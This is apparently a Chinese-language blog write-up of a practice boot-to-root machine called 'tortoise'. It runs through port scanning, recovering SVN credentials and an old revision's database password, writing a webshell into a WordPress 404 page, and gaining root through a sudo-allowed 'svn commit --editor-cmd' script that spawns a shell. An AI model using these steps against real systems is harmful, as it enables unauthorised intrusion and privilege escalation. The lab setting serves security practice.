Loading

群友靶机tortoise wp 

nmap -p- 192.168.10.5
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-30 04:52 EST
Nmap scan report for tortoise.dsz (192.168.10.5)
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3690/tcp open  svn
MAC Address: 08:00:27:D5:23:F7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

添加一下域名,80端口是个WordPress。

感觉突破口在SVN服务上。但是需要得到用户名和密码。然后翻翻文章。http://tortoise.dsz/2026/01/23/a-comprehensive-guide-to-subversion-svn在这里面发现了用户名和密码的设计方式。发现有harry:harryssecret另外一个sally的密码设计也是同理。

svn list -R svn://192.168.10.5/ --username harry --password harryssecret
config.php
svn cat svn://192.168.10.5/config.php --username harry --password harryssecret                  
db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');

发现没有什么有用信息。接下来考虑上传webshell。然后发现不可行。然后看看日志,发现了admin的密码

┌──(kali㉿kali)-[~/Desktop]
└─$ svn log -v svn://192.168.10.5/ --username harry --password harryssecret       
------------------------------------------------------------------------
r2 | root | 2026-01-23 07:13:55 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:
   M /config.php

Remove hardcoded credentials for security
------------------------------------------------------------------------
r1 | root | 2026-01-23 07:13:54 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:
   A /config.php

Initialize database config
------------------------------------------------------------------------                                                      
┌──(kali㉿kali)-[~/Desktop]
└─$ svn cat -r 1 svn://192.168.10.5/config.php --username harry --password harryssecret
db_user='admin'\ndb_pass='S3cret_P@ss_2026'

接下来就是打WordPress了,404页面写马,蚁剑连。

/var/www/localhost/.backup.php中发现define('SECURE_KEY', '1006b3921');猜测是用户密码,果真。

发现可以SVN提权。

                                         
Tortoise:~$ sudo -l
[sudo] password for onehang: 
Matching Defaults entries for onehang on Tortoise:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for onehang:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User onehang may run the following commands on Tortoise:
    (ALL : ALL) /usr/bin/svn
Tortoise:~$ cd /tmp
Tortoise:/tmp$ vim exploit.sh 
Tortoise:/tmp$ cat exploit.sh 
#!/bin/sh
/bin/sh
Tortoise:/tmp$ chmod +x exploit.sh 
Tortoise:/tmp$ sudo /usr/bin/svn commit --editor-cmd /tmp/exploit.sh
/tmp # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/tmp # cat /root/root.txt
flag{root-0b09d631dfda5e9d87a422fc17c1e286}
posted @ 2026-02-01 17:44  场-room  阅读(0)  评论(0)    收藏  举报